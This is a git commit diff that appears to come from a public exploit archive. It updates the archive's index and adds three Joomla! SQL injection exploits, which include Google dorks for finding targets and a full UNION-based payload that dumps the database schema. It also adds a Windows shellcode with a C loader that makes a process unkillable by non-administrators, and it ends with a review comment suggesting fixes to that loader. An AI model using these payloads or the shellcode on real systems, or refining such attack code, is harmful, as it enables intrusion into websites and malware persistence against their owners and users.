DB: 2017-02-18
4 new exploits Netgear WGR614v9 Wireless Router - GET Request Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Windows x86 - Protect Process Shellcode (229 bytes) Qwerty CMS - 'id' SQL Injection Qwerty CMS - 'id' Parameter SQL Injection Golabi CMS - Remote File Inclusion Golabi CMS 1.0 - Remote File Inclusion blogman 0.45 - Multiple Vulnerabilities EZ-Blog 1b - Delete All Posts / SQL Injection Blogman 0.45 - Multiple Vulnerabilities EZ-Blog beta1 - Delete All Posts / SQL Injection Access2asp - imageLibrary - (ASP) Arbitrary File Upload Access2asp - imageLibrary - Arbitrary File Upload Joomla! Component com_digistore - 'pid' Blind SQL Injection Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection EZ-Blog Beta2 - (category) SQL Injection EZ-Blog Beta2 - 'category' Parameter SQL Injection Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection Joomla! Component Groovy Gallery 1.0.0 - SQL Injection Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection
parent
2f2ccec5c2
commit
2d72a9c8b9
5 changed files with 189 additions and 11 deletions
26
files.csv
26
files.csv
|
@ -949,7 +949,7 @@ id,file,description,date,author,platform,type,port
|
|||
8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
|
||||
8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0
|
||||
8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0
|
||||
8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - GET Request Denial of Service",2009-02-25,staticrez,hardware,dos,0
|
||||
8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0
|
||||
8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0
|
||||
8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0
|
||||
8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0
|
||||
|
@ -3649,7 +3649,7 @@ id,file,description,date,author,platform,type,port
|
|||
28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0
|
||||
28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0
|
||||
28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0
|
||||
28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
|
||||
28775,platforms/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
|
||||
28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos,0
|
||||
30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0
|
||||
28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0
|
||||
|
@ -3962,7 +3962,7 @@ id,file,description,date,author,platform,type,port
|
|||
31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0
|
||||
31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0
|
||||
31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0
|
||||
31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0
|
||||
31403,platforms/unix/dos/31403.txt,"Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0
|
||||
31429,platforms/multiple/dos/31429.py,"VideoLAN VLC Media Player 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,multiple,dos,0
|
||||
31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0
|
||||
31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0
|
||||
|
@ -8172,7 +8172,7 @@ id,file,description,date,author,platform,type,port
|
|||
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0
|
||||
30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30839,platforms/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0
|
||||
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
|
||||
31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
|
||||
|
@ -15897,6 +15897,7 @@ id,file,description,date,author,platform,type,port
|
|||
41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
|
||||
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
|
||||
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
|
||||
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -20786,13 +20787,13 @@ id,file,description,date,author,platform,type,port
|
|||
8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' Parameter SQL Injection",2009-02-23,K-159,php,webapps,0
|
||||
8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0
|
||||
8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0
|
||||
8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
|
||||
8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' Parameter SQL Injection",2009-02-24,b3,php,webapps,0
|
||||
8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
|
||||
8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8112,platforms/php/webapps/8112.txt,"Golabi CMS - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0
|
||||
8112,platforms/php/webapps/8112.txt,"Golabi CMS 1.0 - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0
|
||||
8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0
|
||||
8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0
|
||||
8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
|
||||
|
@ -20800,13 +20801,13 @@ id,file,description,date,author,platform,type,port
|
|||
8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
|
||||
8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
|
||||
8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
|
||||
8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8127,platforms/php/webapps/8127.txt,"Blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8128,platforms/php/webapps/8128.txt,"EZ-Blog beta1 - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0
|
||||
8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0
|
||||
8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - (ASP) Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0
|
||||
8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0
|
||||
8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps,0
|
||||
8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0
|
||||
8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0
|
||||
8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0
|
||||
8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0
|
||||
|
@ -21010,7 +21011,7 @@ id,file,description,date,author,platform,type,port
|
|||
8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0
|
||||
8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0
|
||||
8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
|
||||
8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
|
||||
8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' Parameter SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
|
||||
8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0
|
||||
8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php with' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
|
||||
8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0
|
||||
|
@ -37296,3 +37297,6 @@ id,file,description,date,author,platform,type,port
|
|||
41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0
|
||||
41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80
|
||||
41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0
|
||||
41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
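--- /dev/null
+++ b/platforms/php/webapps/41379.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_teamdisplay
+# Date: 17.02.2017
+# Vendor Homepage: http://addonstreet.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/
+# Demo: http://addonstreet.com/demo/teamdisplay/
+# Version: 1.2.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL]
+# # # # #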
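--- /dev/null
+++ b/platforms/php/webapps/41380.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_groovygallery
+# Date: 17.02.2017
+# Vendor Homepage: http://addonstreet.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
+# Demo: http://addonstreet.com/products/groovy-gallery
+# Version: 1.0.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
+# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
+# # # # #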
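--- /dev/null
+++ b/platforms/php/webapps/41382.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_wmt_content_timeline
+# Date: 17.02.2017
+# Vendor Homepage: http://devecostudio.com
+# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
+# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
+# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
+# # # # #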
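--- /dev/null
+++ b/platforms/win_x86/shellcode/41381.c
@@ -0,0 +1,121 @@
+/*
+
+# Win32 - Protect Process Shellcode
+# Date: [17.02.2017]
+# Author: [Ege Balcı]
+# Tested on: [Win 7/8/8.1/10]
+
+This shellcode sets the SE_DACL_PROTECTED flag inside security descriptor structure,
+this will prevent the process being terminated by non administrative users.
+
+-----------------------------------------------------------------
+
+[BITS 32]
+[ORG 0]
+
+; EAX-> Return Values
+; EBX-> Process Handle
+; EBP-> API Block
+; ESI-> Saved ESP
+
+pushad ; Save all registers to stack
+pushfd ; Save all flags to stack
+
+push esp ; Push the current esp value
+pop esi ; Save the current esp value to ecx
+
+cld ; Clear direction flags
+call Start
+
+%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
+
+Start:
+pop ebp ; Pop the address of SFHA
+
+push 0x62C64749 ; hash(kernel32.dll, GetCurrentProcessId())
+call ebp ; GetCurrentProcessId()
+
+push eax ; Process ID
+push 0x00000000 ; FALSE
+push 0x1F0FFF ; PROCESS_ALL_ACCESS
+push 0x50B695EE ; hash(kernel32.dll, OpenProcess)
+call ebp ; OpenProcess(PROCESS_ALL_ACCESS,FALSE,ECX)
+mov ebx, eax ; Move process handle to ebx
+
+
+push 0x00000000 ; 0,0
+push 0x32336970 ; pi32
+push 0x61766461 ; adva
+push esp ; Push the address of "advapi32" string
+push 0x0726774C ; hash(kernel32.dll, LoadLibraryA)
+call ebp ; LoadLibraryA("advapi32")
+
+push 0x00503a44 ; "D:P"
+sub esp,4 ; Push the address of "D:P" string to stack
+
+push 0x00000000 ; FALSE
+lea eax, [esp+4] ; Load the address of 4 byte buffer to EAX
+push eax ; Push the 4 byte buffer address
+push 0x00000001 ; SDDL_REVISION_1
+lea eax, [esp+16] ; Load the address of "D:P" string to EAX
+push eax ; Push the EAX value
+push 0xDA6F639A ; hash(advapi32.dll, ConvertStringSecurityDescriptorToSecurityDescriptor)
+call ebp ; ConvertStringSecurityDescriptorToSecurityDescriptor("D:P",SDDL_REVISION_1,FALSE)
+
+push 0x00000004 ; DACL_SECURITY_INFORMATION
+push ebx ; Process Handle
+push 0xD63AF8DB ; hash(kernel32.dll, SetKernelObjectSecurity)
+call ebp ; SetKernelObjectSecurity(ProcessHandle,DACL_SECURITY_INFORMATION,SecurityDescriptor)
+
+mov esp,esi ; Restore the address of esp
+popad ; Popback all registers
+popfd ; Popback all flags
+ret ; Return
+
+
+*/
+
+
+//>Special thanks to Yusuf Arslan Polat ;D
+#include <windows.h>
+#include <stdio.h>
+
+unsigned char Shellcode[] = {
+0x60, 0x9c, 0x54, 0x5e, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
+0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
+0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
+0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2,
+0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
+0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
+0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac,
+0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8,
+0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66,
+0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01,
+0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
+0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x49, 0x47,
+0xc6, 0x62, 0xff, 0xd5, 0x50, 0x6a, 0x00, 0x68, 0xff, 0x0f, 0x1f, 0x00,
+0x68, 0xee, 0x95, 0xb6, 0x50, 0xff, 0xd5, 0x89, 0xc3, 0x6a, 0x00, 0x68,
+0x70, 0x69, 0x33, 0x32, 0x68, 0x61, 0x64, 0x76, 0x61, 0x54, 0x68, 0x4c,
+0x77, 0x26, 0x07, 0xff, 0xd5, 0x68, 0x44, 0x3a, 0x50, 0x00, 0x83, 0xec,
+0x04, 0x6a, 0x00, 0x8d, 0x44, 0x24, 0x04, 0x50, 0x6a, 0x01, 0x8d, 0x44,
+0x24, 0x10, 0x50, 0x68, 0x9a, 0x63, 0x6f, 0xda, 0xff, 0xd5, 0x6a, 0x04,
+0x53, 0x68, 0xdb, 0xf8, 0x3a, 0xd6, 0xff, 0xd5, 0x89, 0xf4, 0x61, 0x9d,
+0xc3
+};
+
+
+
+int main(int argc, char const *argv[])
+{
+char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+memcpy(BUFFER, Shellcode, sizeof(Shellcode));
+(*(void(*)())BUFFER)();
+
+printf("This process is protected !");
+getchar();
+
+return 0;
+}
+
+
+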
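Review bot: In `main`, the `VirtualAlloc` result is handed to `memcpy` and then called without a NULL check, so an allocation failure turns into a write through a null pointer instead of an error; add `if (BUFFER == NULL) { printf("VirtualAlloc failed: %lu\n", GetLastError()); return 1; }` before the `memcpy`. The stub also returns no status — the results of ConvertStringSecurityDescriptorToSecurityDescriptor and SetKernelObjectSecurity are left in EAX and then overwritten by `popad` — so `printf("This process is protected !")` runs even when the DACL was never applied; either a comment stating that the message is unconditional, or a C-side check of the process's security descriptor after the call, would keep the output honest. The comment on `pop esi` in the listing reads `; Save the current esp value to ecx` but the destination is ESI; `; Save the current esp value to esi` matches the register map above it.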